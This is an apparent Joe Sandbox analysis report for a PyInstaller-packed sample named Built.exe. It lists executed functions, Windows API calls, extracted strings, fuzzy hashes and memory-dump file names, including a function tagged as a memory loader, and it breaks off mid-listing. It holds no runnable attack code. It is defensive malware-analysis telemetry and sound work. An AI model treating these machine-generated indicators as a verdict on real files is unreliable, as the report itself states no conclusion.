Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: dc68054cd116e748200abaed3056cc6a73184f056bcf99fd2a0917b809896555
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: D821E472A0838286FF209B16D84526E73B1FB84B44F954035DA8C83696DF7EE945DF43

Function 00007FF62664FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF62664FE08
RaiseException.KERNEL32 ref: 00007FF62664FE49

Strings

csm, xrefs: 00007FF62664FE36

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 9f2f6502ed7a1bbb3ad87a2f64282b53d1245c60ec3d8c94ba26d750ce038211
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 25113D32618B8282EB618F15F85026AB7E5FB88B84F584230DF8D47769DF7DD551CB01

Function 00007FF6266607AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266607DC
GetDriveTypeW.KERNEL32 ref: 00007FF62666081C

Strings

:, xrefs: 00007FF626660805

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 67339ac808a419b7276d4cba451acde03c84c3de1b5988d905cdff8cbac04b00
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 4B01442291C28385FF209F60A8662BE77A0FF85748F840036D54DC6691DF2EE554EF17

Analysis Process: Built.exePID: 1420, Parent PID: 5432COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	737
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF626641000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF626643D35
Failed to remove temporary directory: %s, xrefs: 00007FF626643FC3
pyi-python-flag, xrefs: 00007FF626643AD6
pyi-disable-windowed-traceback, xrefs: 00007FF626643BB2
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF626643882, 00007FF6266438AF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF626643971
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF626643BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6266439DE
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF626643D12
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF626643A0B, 00007FF626643CD4, 00007FF626643F6B
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF626643A17, 00007FF626643A2F, 00007FF626643A9B
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF626643EBB
MEI, xrefs: 00007FF626643933
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF626643B32
Py_GIL_DISABLED, xrefs: 00007FF626643AF4
Could not create temporary directory!, xrefs: 00007FF626643CBF
Failed to load splash screen resources!, xrefs: 00007FF626643E85
pyi-contents-directory, xrefs: 00007FF626643B8D
_PYI_ARCHIVE_FILE, xrefs: 00007FF6266438D2, 00007FF6266439FF
pkg, xrefs: 00007FF6266439BE
Failed to start splash screen!, xrefs: 00007FF626643ED4
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF626643EA6
Failed to convert DLL search path!, xrefs: 00007FF626643DDC
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF626643E0A
bye-runtime-tmpdir, xrefs: 00007FF626643B68
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF626643C61
_PYI_SPLASH_IPC, xrefs: 00007FF626643A23, 00007FF626643EF5
VCRUNTIME140.dll, xrefs: 00007FF626643DB1

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
Instruction ID: a0bc54d492fb74ba83bbc9bbfa4fd83e747064c75617aab85271ba1dba420f5f
Opcode Fuzzy Hash: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
Instruction Fuzzy Hash: 00329F21A0CA8391FE359B22EC653B96751BF84740F484032DA5DD32D6EFAEE554EB03

Function 00007FF6266669D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626666749
Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266667C7
Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626666818

CreateFileW.KERNEL32 ref: 00007FF626666ADA
CreateFileW.KERNEL32 ref: 00007FF626666B2A
GetLastError.KERNEL32 ref: 00007FF626666B5A
GetFileType.KERNEL32 ref: 00007FF626666B6F
GetLastError.KERNEL32 ref: 00007FF626666B79
CloseHandle.KERNEL32 ref: 00007FF626666BAC
CloseHandle.KERNEL32 ref: 00007FF626666D0F
CreateFileW.KERNEL32 ref: 00007FF626666D44
GetLastError.KERNEL32 ref: 00007FF626666D53

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 2a4b239bc42938db0c29a043dfb3ae7c8c225f3b66a64ed84993c92f0486f759
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 71C1B132B28A4286EF10CF69E8912AC3761FB49B98F115225DE2ED7795CF3ED411D702

Function 00007FFDF150E1F0 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 513fileCOMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF150E40F

Part of subcall function 00007FFDF150DCC0: 00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF150DD2B

CreateFileW.KERNELBASE ref: 00007FFDF150E4CA

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDF150E5A1
psow, xrefs: 00007FFDF150E880
exclusive, xrefs: 00007FFDF150E405
winOpen, xrefs: 00007FFDF150E72F

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007$B5630CreateE103019File
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 568289115-3829269058
Opcode ID: 1b2a7c53af12bdbe0c878ab5fa1b74bd895439f0f24456165b4c702e91fc1b90
Instruction ID: 8636b7b12a4abff12fe23d9dfb6c7cffb5a7e5d2c00aa4df251c56a509fcec2d
Opcode Fuzzy Hash: 1b2a7c53af12bdbe0c878ab5fa1b74bd895439f0f24456165b4c702e91fc1b90
Instruction Fuzzy Hash: D732C121F0D65386FB668BA4A464B7967A8FF84760F284635D97E023ECDF3CE4859700

Function 00007FFDF1413230 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDF1413CF0
GetProcAddress.KERNEL32 ref: 00007FFDF1413D1A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDF1413DA4
VirtualProtect.KERNEL32 ref: 00007FFDF1413DC2

Memory Dump Source

Source File: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
Instruction ID: d059a73ba7cf1f15a31f34a598a67b922736cb15336de7a60ac0c10bab276b1f
Opcode Fuzzy Hash: 6912a145b092a435b2690e8e050799ca64382d8315b3fc9a28e3f91c66e0900d
Instruction Fuzzy Hash: F862562272819296E7168F39D41077D7BA4F788795F045532EAAED37C8EB3CEA45CB00

Function 00007FFDF1580520 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

00007FFE103019A0.VCRUNTIME140 ref: 00007FFDF1580599

Strings

database schema is locked: %s, xrefs: 00007FFDF15806C6
statement too long, xrefs: 00007FFDF1580722

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007E103019
String ID: database schema is locked: %s$statement too long
API String ID: 2848303308-388537643
Opcode ID: 47b157e483caf21196fdc259579a5533f8dc661c32b5f0ec5790168fc495ebcb
Instruction ID: 51705d0d21f3ece99b8d274523ead2e493b45c3e99619dea82e66088dfa7a6e9
Opcode Fuzzy Hash: 47b157e483caf21196fdc259579a5533f8dc661c32b5f0ec5790168fc495ebcb
Instruction Fuzzy Hash: ACE19222B1978286FB669B219460BBD67B8FB44B54F848035DA6D077EDCF3DE498C700

Function 00007FFDF151F7D0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF151F838

Strings

:memory:, xrefs: 00007FFDF151F82E

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: 00007B5630
String ID: :memory:
API String ID: 2248877218-2920599690
Opcode ID: ee23b59d19c7649da2495297630407580cb998f5201e9e0c00ee3db02f2d9191
Instruction ID: a5868a480fc454c57bca787a639518bce8499358dfee2e1cefa94dcb0c0a4f19
Opcode Fuzzy Hash: ee23b59d19c7649da2495297630407580cb998f5201e9e0c00ee3db02f2d9191
Instruction Fuzzy Hash: AF429F22B0979296EB6A8B259464B7937B8FF85B44F044136DE6D137E8DF7CE488C340

Function 00007FF6266492F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF626649323
FindClose.KERNEL32 ref: 00007FF626649332

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 591a331624e7a7add791163fc94b0685481a0cfaa248aeb4fc6dfbffb7cda6ac
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: B1F0A422A18642C6FB708B60B85876A6350BB85338F040335D96D426D4DF7DD4589F02

Function 00007FFDF150F4C0 Relevance: 1.7, APIs: 1, Instructions: 213COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,00007FFDF15B984B,?,?,?,?,00007FFDF150831D,?,?,?,?,00007FFDF1534917), ref: 00007FFDF150F4E8

Memory Dump Source

Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true

Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0f2854fc0c1696ac9a4d72ac8c4f09e52b18281d07824d8197d11b144013fc62
Instruction ID: b9753bba1aded3c352ff9714476b4b96b8b994a9613d7fbc91ee92675c41a1a4
Opcode Fuzzy Hash: 0f2854fc0c1696ac9a4d72ac8c4f09e52b18281d07824d8197d11b144013fc62
Instruction Fuzzy Hash: F4A1E321F0EB0786FF5A8BA5A870A7422B8BF45B84F580536C92E463FCDF6DE5558240

Function 00007FFDF145FE90 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1020COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF145FEF8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF145FF1D
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF1460A58

Strings

ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF145FFFB
DEFAULT, xrefs: 00007FFDF1460A45
ALL:!COMPLEMENTOFDEFAULT:!eNULL, xrefs: 00007FFDF1460A82
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF1460002, 00007FFDF146000F
SUITEB128C2, xrefs: 00007FFDF145FF13
..\s\ssl\ssl_ciph.c, xrefs: 00007FFDF145FFAC, 00007FFDF1460068, 00007FFDF1460863, 00007FFDF146088B, 00007FFDF14608AA, 00007FFDF1460AED, 00007FFDF1460B21, 00007FFDF1460BA8, 00007FFDF1460C18
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FFDF1460018
SUITEB192, xrefs: 00007FFDF145FF58
SUITEB128, xrefs: 00007FFDF145FF37
SUITEB128ONLY, xrefs: 00007FFDF145FEEF

Memory Dump Source

Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true

Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
API String ID: 4069847057-3030769715
Opcode ID: 3e6155f2c061cdf16a58c9cbfd482980749103d55c62b2cd3a361ebb4869f036
Instruction ID: f9a1caecfb86eaa7065902475d133ac0072e119749ffafbfa8197de18b971f49
Opcode Fuzzy Hash: 3e6155f2c061cdf16a58c9cbfd482980749103d55c62b2cd3a361ebb4869f036
Instruction Fuzzy Hash: CD928F72B09B4682EF69CF459460A78A3A8FB94B88F184035DE6D477D8DF3ED981C740

Function 00007FF626641950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626647F80: _fread_nolock.LIBCMT ref: 00007FF62664802A

_fread_nolock.LIBCMT ref: 00007FF626641A1B

Part of subcall function 00007FF626642910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E

Strings

calloc, xrefs: 00007FF626641A68
fread, xrefs: 00007FF626641A32, 00007FF626641B5C
Failed to read cookie!, xrefs: 00007FF626641A2B
Failed to seek to cookie position!, xrefs: 00007FF6266419EE
fseek, xrefs: 00007FF6266419F5
Error on file., xrefs: 00007FF626641B8D
Could not allocate buffer for TOC!, xrefs: 00007FF626641B1B
malloc, xrefs: 00007FF626641B22
MEI, xrefs: 00007FF626641991
Could not read full TOC!, xrefs: 00007FF626641B55
Could not allocate memory for archive structure!, xrefs: 00007FF626641A61

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction ID: 721ca4d310a3b0555481ed9d439471ffb16e80f0896e4e527ae070d2dbcd9d4e
Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction Fuzzy Hash: 81819071A0C68786EF20DB24E8612B963A0FF84784F404031D98DD7B86DE7EE585AF43

Function 00007FF626641470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266414DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266415DF
fread, xrefs: 00007FF6266415E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF626641518
fseek, xrefs: 00007FF6266414E5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF62664149F
malloc, xrefs: 00007FF62664151F

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
